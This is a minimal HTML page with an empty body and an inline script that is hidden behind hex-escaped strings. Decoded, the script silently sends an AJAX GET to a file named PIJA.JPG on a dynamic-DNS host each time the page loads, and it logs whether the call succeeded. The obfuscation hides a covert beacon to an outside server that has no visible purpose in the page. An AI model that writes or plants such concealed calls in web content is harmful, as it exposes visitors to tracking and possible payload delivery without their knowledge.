
<html lang="en">
	<head>
		<script src="jquery-1.11.1.min.js"></script>
		<script src="bootstrap.min.js"></script>	
	</head>

	<body>
		<div>
		</div>
	</body>

	<script>		
var _0x645e=["\x47\x45\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x70\x65\x78\x70\x6C\x6F\x72\x65\x72\x2E\x64\x64\x6E\x73\x2E\x6E\x65\x74\x2F\x50\x49\x4A\x41\x2E\x4A\x50\x47","\x50\x49\x4A\x41\x2E\x47\x50\x47","\x74\x65\x78\x74","\x4F\x6B","\x6C\x6F\x67","\x43\x61\x6C\x6C\x20\x66\x61\x69\x6C\x65\x64","\x61\x6A\x61\x78"];$[_0x645e[7]]({type:_0x645e[0],url:_0x645e[1],data:_0x645e[2],dataType:_0x645e[3],success:function(_0x2bc7x1){console[_0x645e[5]](_0x645e[4])},error:function(_0x2bc7x1){console[_0x645e[5]](_0x645e[6])}});
	</script>		
</html>